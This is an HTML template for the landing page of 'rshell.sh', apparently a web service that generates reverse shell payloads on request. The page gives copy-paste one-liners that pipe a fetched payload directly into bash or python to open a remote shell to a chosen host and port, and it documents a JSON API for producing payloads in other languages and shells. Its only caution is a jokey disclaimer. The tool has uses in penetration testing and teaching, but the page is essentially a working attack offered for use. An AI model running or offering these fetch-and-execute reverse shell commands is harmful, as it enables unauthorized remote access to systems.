{% extends 'base.html' %}

{% block body %}

<h1>rshell.sh</h1>
<h2>Reverse Shell Payload Microservice</h2>
<img style="position:fixed; right:30px; top:20px; height:25; width:25; background-color:white" src="static/img/white-hat.png">
<hr>
<h3><u>Examples</u></h3>
* Basic Usage: 
<pre>
curl rshell.sh/10.0.0.1/1234 | bash
</pre>

* Different Languages:
<pre>
curl rshell.sh/10.0.0.1/1234/?lang=python | python 
</pre>

* Quote Wrapped:
<pre>
curl rshell.sh/10.0.0.1/1234?quotes=single | xargs bash -c
</pre>

* <a href="/help">Web & Term Friendly Help Page</a>:
<pre>
curl rshell.sh/help
</pre>

* JSON API:
<pre>
curl -sd '{"host":"10.0.0.1", "port":1234, "lang":"python", "shell":"zsh"}' -H "Content-Type: application/json" -X POST  https://rshell.sh/api
</pre>

<br>
<p style="color: red"><u><b>Plz No Use 4 Bad Hax!!!</b></u></p>

<br>
<a href="https://github.com/BlueSquare23/Rshell.sh">Project's Github</a>
<br>
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" target="_blank">Comprehensive Payload List</a>


{% endblock %}
